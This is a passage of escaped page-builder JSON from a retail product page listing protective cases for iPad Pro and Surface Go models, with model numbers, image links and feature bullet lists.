class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73803GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6eaf744\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"043a47e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73902GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Signature Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b4b865\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"246c1eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4857c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black\\/Charcoal, Rose Gold &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports, and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e18e471\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04d07d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal, Blue &amp; Red<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d27da\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9b51775\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe6de1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6895690\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cac6c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c724b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"afa9c21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c4b6b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a983d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0414077\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e27080\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"52a45e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1748b19\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"24f99b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7472688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e19a656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d135e68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek <\\/strong><strong>11-inch\\u00a0 <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c5f1a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"94b3c2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74502GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc6acc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9268480\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0e368ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"039f013\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d9e6d7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"77e1d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e079a49\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"192\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8b54b12\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8672d06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d70140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black &amp; Gold<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ce129\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a2e1c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a76315d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c26b89d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a780230\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8102767\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e736638\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e712cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9336132\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b49729\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3df92b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6c073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b7d1d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e683a6d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f005697\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3c683c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cfc8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8d2137\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1467ed2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek\\u2122 <\\/strong><strong>Rotating Case <\\/strong><strong>12.9-inch iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ748GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"44f9857\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e380076\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Classic Case for <\\/strong><strong>12.9-inch <\\/strong><strong>iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ749GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c30185\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4ec1175\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23ccf88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c06e0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30b6c65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"16573a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"44ec04c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"907f6a3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6718b07\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc7a527\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black, Red &amp; Burgundy<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6601d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27e4cb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design delivers practical protection and enhances stability<\\/li><li>Patented custom-molded tray with reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing<\\/li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"780ec47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb1d3b2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e704695\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"39b318b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df3be40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba13e6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe249f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"278724c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"027329b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054db58\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6196c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"39f71bf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"208ace1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd3ee9d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26b4f3b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>12.9-inch\\u00a0<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ750GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4a121f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"674bee1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>SafePort Rugged <\\/strong><strong>Case for <\\/strong><strong>12.9-inch iPad <\\/strong><strong>(6th gen. \\/ 5th gen.)<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD138GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2bed517\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aae738f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6a9f2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Signature Series Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a7759bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c62f212\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cb966a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ba550a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da4bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4bdd233\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6c9e329\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch)<\\/li><li>Form-fit TPU shell with USA Military-Spec drop protection \\u2013 protects your device from 1.2m\\/4ft drops<\\/li><li>Offers rugged protection in a slim, professional-looking case<\\/li><li>Sound enhancing scoops for all iPad speakers<\\/li><li>Integrated stand for stable viewing and comfortable typing<\\/li><li>Optional detachable shoulder strap (THA101GLZ)<\\/li><li>Compatible with the ambient light sensor and mic on your device<\\/li><li>Clear window on back to display asset tag<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b71a0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26da7ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7094b67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c542f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3243ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d729ea6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"60d35e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84813a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46d1844\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5da049f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ac39cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ779GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f231dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db2432a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD491GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8dc8da\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1953aa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac8efa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\\\" width=\\\"193\\\" height=\\\"193\\\" 